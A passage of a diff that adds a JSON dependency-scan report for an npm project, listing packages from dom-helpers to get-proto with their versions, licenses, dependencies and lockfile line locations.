"pkg:npm/dom-helpers@5.2.1", + "UID": "42b97c48d2ade526" + }, + "Version": "5.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/runtime@7.29.2", + "csstype@3.2.3" + ], + "Locations": [ + { + "StartLine": 4597, + "EndLine": 4606 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dom-serializer@2.0.0", + "Name": "dom-serializer", + "Identifier": { + "PURL": "pkg:npm/dom-serializer@2.0.0", + "UID": "d1ab23907f7e3d97" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "domelementtype@2.3.0", + "domhandler@5.0.3", + "entities@4.5.0" + ], + "Locations": [ + { + "StartLine": 4607, + "EndLine": 4620 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "domelementtype@2.3.0", + "Name": "domelementtype", + "Identifier": { + "PURL": "pkg:npm/domelementtype@2.3.0", + "UID": "40a1b6a7799af732" + }, + "Version": "2.3.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4621, + "EndLine": 4632 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "domhandler@5.0.3", + "Name": "domhandler", + "Identifier": { + "PURL": "pkg:npm/domhandler@5.0.3", + "UID": "614fa134847d9dbc" + }, + "Version": "5.0.3", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "domelementtype@2.3.0" + ], + "Locations": [ + { + "StartLine": 4633, + "EndLine": 4647 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "domutils@3.2.2", + "Name": "domutils", + "Identifier": { + "PURL": "pkg:npm/domutils@3.2.2", + "UID": "8c808e0657fdad81" + }, + "Version": "3.2.2", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "dom-serializer@2.0.0", + "domelementtype@2.3.0", + "domhandler@5.0.3" + ], + "Locations": [ + { + "StartLine": 4648, + "EndLine": 4661 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dunder-proto@1.0.1", + "Name": "dunder-proto", + "Identifier": { + "PURL": "pkg:npm/dunder-proto@1.0.1", + "UID": "7c574d08024d363b" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bind-apply-helpers@1.0.2", + "es-errors@1.3.0", + "gopd@1.2.0" + ], + "Locations": [ + { + "StartLine": 4662, + "EndLine": 4675 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "duplexify@4.1.3", + "Name": "duplexify", + "Identifier": { + "PURL": "pkg:npm/duplexify@4.1.3", + "UID": "76441d675fad4843" + }, + "Version": "4.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "end-of-stream@1.4.5", + "inherits@2.0.4", + "readable-stream@3.6.2", + "stream-shift@1.0.3" + ], + "Locations": [ + { + "StartLine": 4676, + "EndLine": 4688 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "eastasianwidth@0.2.0", + "Name": "eastasianwidth", + "Identifier": { + "PURL": "pkg:npm/eastasianwidth@0.2.0", + "UID": "2793f147a9fa1748" + }, + "Version": "0.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4699, + "EndLine": 4704 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ecdsa-sig-formatter@1.0.11", + "Name": "ecdsa-sig-formatter", + "Identifier": { + "PURL": "pkg:npm/ecdsa-sig-formatter@1.0.11", + "UID": "13ce6f930aa73e1e" + }, + "Version": "1.0.11", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safe-buffer@5.2.1" + ], + "Locations": [ + { + "StartLine": 4705, + "EndLine": 4713 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "editorconfig@1.0.7", + "Name": "editorconfig", + "Identifier": { + "PURL": "pkg:npm/editorconfig@1.0.7", + "UID": "62cc93df94233ce7" + }, + "Version": "1.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@one-ini/wasm@0.1.1", + "commander@10.0.1", + "minimatch@9.0.9", + "semver@7.7.4" + ], + "Locations": [ + { + "StartLine": 4714, + "EndLine": 4731 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ee-first@1.1.1", + "Name": "ee-first", + "Identifier": { + "PURL": "pkg:npm/ee-first@1.1.1", + "UID": "ce9ae72d691b523d" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4756, + "EndLine": 4761 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "electron-to-chromium@1.5.345", + "Name": "electron-to-chromium", + "Identifier": { + "PURL": "pkg:npm/electron-to-chromium@1.5.345", + "UID": "3bc12a0909bbff1a" + }, + "Version": "1.5.345", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4762, + "EndLine": 4767 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "emoji-regex@10.6.0", + "Name": "emoji-regex", + "Identifier": { + "PURL": "pkg:npm/emoji-regex@10.6.0", + "UID": "7c5282d972139dd4" + }, + "Version": "10.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4768, + "EndLine": 4773 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "emoji-regex@8.0.0", + "Name": "emoji-regex", + "Identifier": { + "PURL": "pkg:npm/emoji-regex@8.0.0", + "UID": "1d0d5b0536cf9a80" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9224, + "EndLine": 9229 + }, + { + "StartLine": 9230, + "EndLine": 9235 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "emoji-regex@9.2.2", + "Name": "emoji-regex", + "Identifier": { + "PURL": "pkg:npm/emoji-regex@9.2.2", + "UID": "409ba11369001fde" + }, + "Version": "9.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1459, + "EndLine": 1464 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "encodeurl@2.0.0", + "Name": "encodeurl", + "Identifier": { + "PURL": "pkg:npm/encodeurl@2.0.0", + "UID": "928cd91b6a9d2a8b" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4774, + "EndLine": 4782 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "end-of-stream@1.4.5", + "Name": "end-of-stream", + "Identifier": { + "PURL": "pkg:npm/end-of-stream@1.4.5", + "UID": "f58bba7f72b7410e" + }, + "Version": "1.4.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "once@1.4.0" + ], + "Locations": [ + { + "StartLine": 4783, + "EndLine": 4792 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "engine.io@6.6.7", + "Name": "engine.io", + "Identifier": { + "PURL": "pkg:npm/engine.io@6.6.7", + "UID": "a84cd399b8a210eb" + }, + "Version": "6.6.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/cors@2.8.19", + "@types/node@20.19.39", + "@types/ws@8.18.1", + "accepts@1.3.8", + "base64id@2.0.0", + "cookie@0.7.2", + "cors@2.8.6", + "debug@4.4.3", + "engine.io-parser@5.2.3", + "ws@8.18.3" + ], + "Locations": [ + { + "StartLine": 4793, + "EndLine": 4813 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "engine.io-client@6.6.4", + "Name": "engine.io-client", + "Identifier": { + "PURL": "pkg:npm/engine.io-client@6.6.4", + "UID": "fa32925863d057f7" + }, + "Version": "6.6.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@socket.io/component-emitter@3.1.2", + "debug@4.4.3", + "engine.io-parser@5.2.3", + "ws@8.18.3", + "xmlhttprequest-ssl@2.1.2" + ], + "Locations": [ + { + "StartLine": 4814, + "EndLine": 4826 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "engine.io-parser@5.2.3", + "Name": "engine.io-parser", + "Identifier": { + "PURL": "pkg:npm/engine.io-parser@5.2.3", + "UID": "d71aade2164c2724" + }, + "Version": "5.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4827, + "EndLine": 4835 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "entities@4.5.0", + "Name": "entities", + "Identifier": { + "PURL": "pkg:npm/entities@4.5.0", + "UID": "2ebb20f3fecafa9" + }, + "Version": "4.5.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4845, + "EndLine": 4856 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "es-define-property@1.0.1", + "Name": "es-define-property", + "Identifier": { + "PURL": "pkg:npm/es-define-property@1.0.1", + "UID": "ecb234adda087bc6" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4857, + "EndLine": 4865 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "es-errors@1.3.0", + "Name": "es-errors", + "Identifier": { + "PURL": "pkg:npm/es-errors@1.3.0", + "UID": "d1076850566adb94" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4866, + "EndLine": 4874 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "es-object-atoms@1.1.1", + "Name": "es-object-atoms", + "Identifier": { + "PURL": "pkg:npm/es-object-atoms@1.1.1", + "UID": "c6a20059ea9a7b1f" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0" + ], + "Locations": [ + { + "StartLine": 4875, + "EndLine": 4886 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "es-set-tostringtag@2.1.0", + "Name": "es-set-tostringtag", + "Identifier": { + "PURL": "pkg:npm/es-set-tostringtag@2.1.0", + "UID": "35cee62be8994c4e" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0", + "get-intrinsic@1.3.0", + "has-tostringtag@1.0.2", + "hasown@2.0.3" + ], + "Locations": [ + { + "StartLine": 4887, + "EndLine": 4901 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "escalade@3.2.0", + "Name": "escalade", + "Identifier": { + "PURL": "pkg:npm/escalade@3.2.0", + "UID": "cd4f1e0ee5b5ba89" + }, + "Version": "3.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4941, + "EndLine": 4949 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "escape-html@1.0.3", + "Name": "escape-html", + "Identifier": { + "PURL": "pkg:npm/escape-html@1.0.3", + "UID": "2d4ccab25030e05f" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4950, + "EndLine": 4955 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "etag@1.8.1", + "Name": "etag", + "Identifier": { + "PURL": "pkg:npm/etag@1.8.1", + "UID": "b0992a177a119928" + }, + "Version": "1.8.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5130, + "EndLine": 5138 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "event-target-shim@5.0.1", + "Name": "event-target-shim", + "Identifier": { + "PURL": "pkg:npm/event-target-shim@5.0.1", + "UID": "7cf315c3ae823489" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5139, + "EndLine": 5148 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "eventemitter3@4.0.7", + "Name": "eventemitter3", + "Identifier": { + "PURL": "pkg:npm/eventemitter3@4.0.7", + "UID": "f88f630827877e04" + }, + "Version": "4.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5149, + "EndLine": 5154 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "events@3.3.0", + "Name": "events", + "Identifier": { + "PURL": "pkg:npm/events@3.3.0", + "UID": "49746143ebe5d93d" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5155, + "EndLine": 5163 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "express@4.22.1", + "Name": "express", + "Identifier": { + "PURL": "pkg:npm/express@4.22.1", + "UID": "61fd036c11c8cced" + }, + "Version": "4.22.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "accepts@1.3.8", + "array-flatten@1.1.1", + "body-parser@1.20.5", + "content-disposition@0.5.4", + "content-type@1.0.5", + "cookie-signature@1.0.7", + "cookie@0.7.2", + "debug@2.6.9", + "depd@2.0.0", + "encodeurl@2.0.0", + "escape-html@1.0.3", + "etag@1.8.1", + "finalhandler@1.3.2", + "fresh@0.5.2", + "http-errors@2.0.1", + "merge-descriptors@1.0.3", + "methods@1.1.2", + "on-finished@2.4.1", + "parseurl@1.3.3", + "path-to-regexp@0.1.13", + "proxy-addr@2.0.7", + "qs@6.14.2", + "range-parser@1.2.1", + "safe-buffer@5.2.1", + "send@0.19.2", + "serve-static@1.16.3", + "setprototypeof@1.2.0", + "statuses@2.0.2", + "type-is@1.6.18", + "utils-merge@1.0.1", + "vary@1.1.2" + ], + "Locations": [ + { + "StartLine": 5201, + "EndLine": 5246 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "express-rate-limit@8.5.1", + "Name": "express-rate-limit", + "Identifier": { + "PURL": "pkg:npm/express-rate-limit@8.5.1", + "UID": "c30567a47af6487e" + }, + "Version": "8.5.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "express@4.22.1", + "ip-address@10.2.0" + ], + "Locations": [ + { + "StartLine": 5247, + "EndLine": 5264 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "extend@3.0.2", + "Name": "extend", + "Identifier": { + "PURL": "pkg:npm/extend@3.0.2", + "UID": "142f8d98c80b4758" + }, + "Version": "3.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5289, + "EndLine": 5295 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "farmhash-modern@1.1.0", + "Name": "farmhash-modern", + "Identifier": { + "PURL": "pkg:npm/farmhash-modern@1.1.0", + "UID": "580a4aa7878313c3" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5296, + "EndLine": 5304 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-deep-equal@2.0.1", + "Name": "fast-deep-equal", + "Identifier": { + "PURL": "pkg:npm/fast-deep-equal@2.0.1", + "UID": "879b47ad6a034c58" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8405, + "EndLine": 8410 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-deep-equal@3.1.3", + "Name": "fast-deep-equal", + "Identifier": { + "PURL": "pkg:npm/fast-deep-equal@3.1.3", + "UID": "7bf3e115d3e7f560" + }, + "Version": "3.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5305, + "EndLine": 5310 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-equals@5.4.0", + "Name": "fast-equals", + "Identifier": { + "PURL": "pkg:npm/fast-equals@5.4.0", + "UID": "29294a65cde4caf0" + }, + "Version": "5.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5311, + "EndLine": 5319 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-glob@3.3.3", + "Name": "fast-glob", + "Identifier": { + "PURL": "pkg:npm/fast-glob@3.3.3", + "UID": "34d4473cc0e7cab6" + }, + "Version": "3.3.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@nodelib/fs.stat@2.0.5", + "@nodelib/fs.walk@1.2.8", + "glob-parent@5.1.2", + "merge2@1.4.1", + "micromatch@4.0.8" + ], + "Locations": [ + { + "StartLine": 5320, + "EndLine": 5335 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-xml-builder@1.1.5", + "Name": "fast-xml-builder", + "Identifier": { + "PURL": "pkg:npm/fast-xml-builder@1.1.5", + "UID": "e589910a79395ad7" + }, + "Version": "1.1.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "path-expression-matcher@1.5.0" + ], + "Locations": [ + { + "StartLine": 5369, + "EndLine": 5384 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-xml-parser@5.7.2", + "Name": "fast-xml-parser", + "Identifier": { + "PURL": "pkg:npm/fast-xml-parser@5.7.2", + "UID": "9759f54cdf2cc117" + }, + "Version": "5.7.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@nodable/entities@2.1.0", + "fast-xml-builder@1.1.5", + "path-expression-matcher@1.5.0", + "strnum@2.2.3" + ], + "Locations": [ + { + "StartLine": 5385, + "EndLine": 5406 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fastq@1.20.1", + "Name": "fastq", + "Identifier": { + "PURL": "pkg:npm/fastq@1.20.1", + "UID": "fe676b5e175cf88d" + }, + "Version": "1.20.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "reusify@1.1.0" + ], + "Locations": [ + { + "StartLine": 5407, + "EndLine": 5415 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "faye-websocket@0.11.4", + "Name": "faye-websocket", + "Identifier": { + "PURL": "pkg:npm/faye-websocket@0.11.4", + "UID": "d02cc2f955b0263d" + }, + "Version": "0.11.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "websocket-driver@0.7.4" + ], + "Locations": [ + { + "StartLine": 5416, + "EndLine": 5427 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fdir@6.5.0", + "Name": "fdir", + "Identifier": { + "PURL": "pkg:npm/fdir@6.5.0", + "UID": "502f8294095fca66" + }, + "Version": "6.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "picomatch@4.0.4" + ], + "Locations": [ + { + "StartLine": 9665, + "EndLine": 9681 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fflate@0.8.2", + "Name": "fflate", + "Identifier": { + "PURL": "pkg:npm/fflate@0.8.2", + "UID": "61464d5ab3c111a8" + }, + "Version": "0.8.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5428, + "EndLine": 5433 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fill-range@7.1.1", + "Name": "fill-range", + "Identifier": { + "PURL": "pkg:npm/fill-range@7.1.1", + "UID": "bf8fed27fdd47afb" + }, + "Version": "7.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "to-regex-range@5.0.1" + ], + "Locations": [ + { + "StartLine": 5447, + "EndLine": 5458 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "finalhandler@1.3.2", + "Name": "finalhandler", + "Identifier": { + "PURL": "pkg:npm/finalhandler@1.3.2", + "UID": "2e13a9639c583949" + }, + "Version": "1.3.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@2.6.9", + "encodeurl@2.0.0", + "escape-html@1.0.3", + "on-finished@2.4.1", + "parseurl@1.3.3", + "statuses@2.0.2", + "unpipe@1.0.0" + ], + "Locations": [ + { + "StartLine": 5459, + "EndLine": 5476 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "find-up@4.1.0", + "Name": "find-up", + "Identifier": { + "PURL": "pkg:npm/find-up@4.1.0", + "UID": "fb251213c34e388d" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "locate-path@5.0.0", + "path-exists@4.0.0" + ], + "Locations": [ + { + "StartLine": 8181, + "EndLine": 8193 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "firebase-admin@12.7.0", + "Name": "firebase-admin", + "Identifier": { + "PURL": "pkg:npm/firebase-admin@12.7.0", + "UID": "a841b26d1c63867d" + }, + "Version": "12.7.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@fastify/busboy@3.2.0", + "@firebase/database-compat@1.0.8", + "@firebase/database-types@1.0.5", + "@google-cloud/firestore@7.11.6", + "@google-cloud/storage@7.19.0", + "@types/node@22.19.17", + "farmhash-modern@1.1.0", + "jsonwebtoken@9.0.3", + "jwks-rsa@3.2.2", + "node-forge@1.4.0", + "uuid@10.0.0" + ], + "Locations": [ + { + "StartLine": 5509, + "EndLine": 5532 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "follow-redirects@1.16.0", + "Name": "follow-redirects", + "Identifier": { + "PURL": "pkg:npm/follow-redirects@1.16.0", + "UID": "64b3624e504d2367" + }, + "Version": "1.16.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5564, + "EndLine": 5583 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fontkit@2.0.4", + "Name": "fontkit", + "Identifier": { + "PURL": "pkg:npm/fontkit@2.0.4", + "UID": "a3e0aba04e40ec9c" + }, + "Version": "2.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@swc/helpers@0.5.21", + "brotli@1.3.3", + "clone@2.1.2", + "dfa@1.2.0", + "fast-deep-equal@3.1.3", + "restructure@3.0.2", + "tiny-inflate@1.0.3", + "unicode-properties@1.4.1", + "unicode-trie@2.0.0" + ], + "Locations": [ + { + "StartLine": 5584, + "EndLine": 5600 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "foreground-child@3.3.1", + "Name": "foreground-child", + "Identifier": { + "PURL": "pkg:npm/foreground-child@3.3.1", + "UID": "1f8e9e326e60d121" + }, + "Version": "3.3.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cross-spawn@7.0.6", + "signal-exit@4.1.0" + ], + "Locations": [ + { + "StartLine": 5601, + "EndLine": 5616 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "form-data@2.5.5", + "Name": "form-data", + "Identifier": { + "PURL": "pkg:npm/form-data@2.5.5", + "UID": "a401bc09d601bf4c" + }, + "Version": "2.5.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "asynckit@0.4.0", + "combined-stream@1.0.8", + "es-set-tostringtag@2.1.0", + "hasown@2.0.3", + "mime-types@2.1.35", + "safe-buffer@5.2.1" + ], + "Locations": [ + { + "StartLine": 5617, + "EndLine": 5634 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "form-data@4.0.5", + "Name": "form-data", + "Identifier": { + "PURL": "pkg:npm/form-data@4.0.5", + "UID": "5173e1b68c4a6a28" + }, + "Version": "4.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "asynckit@0.4.0", + "combined-stream@1.0.8", + "es-set-tostringtag@2.1.0", + "hasown@2.0.3", + "mime-types@2.1.35" + ], + "Locations": [ + { + "StartLine": 3142, + "EndLine": 3158 + }, + { + "StartLine": 3558, + "EndLine": 3573 + }, + { + "StartLine": 9412, + "EndLine": 9428 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "forwarded@0.2.0", + "Name": "forwarded", + "Identifier": { + "PURL": "pkg:npm/forwarded@0.2.0", + "UID": "a89b18e52cb3a030" + }, + "Version": "0.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5653, + "EndLine": 5661 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fraction.js@5.3.4", + "Name": "fraction.js", + "Identifier": { + "PURL": "pkg:npm/fraction.js@5.3.4", + "UID": "9d49315440b3e412" + }, + "Version": "5.3.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5662, + "EndLine": 5674 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fresh@0.5.2", + "Name": "fresh", + "Identifier": { + "PURL": "pkg:npm/fresh@0.5.2", + "UID": "89ce7e0aad007afc" + }, + "Version": "0.5.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5675, + "EndLine": 5683 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fsevents@2.3.3", + "Name": "fsevents", + "Identifier": { + "PURL": "pkg:npm/fsevents@2.3.3", + "UID": "a1dde705c46ac6a5" + }, + "Version": "2.3.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5691, + "EndLine": 5704 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "function-bind@1.1.2", + "Name": "function-bind", + "Identifier": { + "PURL": "pkg:npm/function-bind@1.1.2", + "UID": "88555af697083af6" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5705, + "EndLine": 5713 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "functional-red-black-tree@1.0.1", + "Name": "functional-red-black-tree", + "Identifier": { + "PURL": "pkg:npm/functional-red-black-tree@1.0.1", + "UID": "99384682ed2c98b0" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5714, + "EndLine": 5720 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "gaxios@6.7.1", + "Name": "gaxios", + "Identifier": { + "PURL": "pkg:npm/gaxios@6.7.1", + "UID": "9ab4e83fa01c4b31" + }, + "Version": "6.7.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "extend@3.0.2", + "https-proxy-agent@7.0.6", + "is-stream@2.0.1", + "node-fetch@2.7.0", + "uuid@9.0.1" + ], + "Locations": [ + { + "StartLine": 5721, + "EndLine": 5737 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "gcp-metadata@6.1.1", + "Name": "gcp-metadata", + "Identifier": { + "PURL": "pkg:npm/gcp-metadata@6.1.1", + "UID": "5b181af1713a7d43" + }, + "Version": "6.1.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "gaxios@6.7.1", + "google-logging-utils@0.0.2", + "json-bigint@1.0.0" + ], + "Locations": [ + { + "StartLine": 5753, + "EndLine": 5767 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "get-caller-file@2.0.5", + "Name": "get-caller-file", + "Identifier": { + "PURL": "pkg:npm/get-caller-file@2.0.5", + "UID": "16f7eb6b6acd0187" + }, + "Version": "2.0.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5768, + "EndLine": 5776 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "get-intrinsic@1.3.0", + "Name": "get-intrinsic", + "Identifier": { + "PURL": "pkg:npm/get-intrinsic@1.3.0", + "UID": "73d732b26f3ec0be" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bind-apply-helpers@1.0.2", + "es-define-property@1.0.1", + "es-errors@1.3.0", + "es-object-atoms@1.1.1", + "function-bind@1.1.2", + "get-proto@1.0.1", + "gopd@1.2.0", + "has-symbols@1.1.0", + "hasown@2.0.3", + "math-intrinsics@1.1.0" + ], + "Locations": [ + { + "StartLine": 5787, + "EndLine": 5810 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "get-proto@1.0.1", + "Name": "get-proto", + "Identifier": { + "PURL": "pkg:npm/get-proto@1.0.1", + "UID": "93991544cff2553a" + }, + "Version": 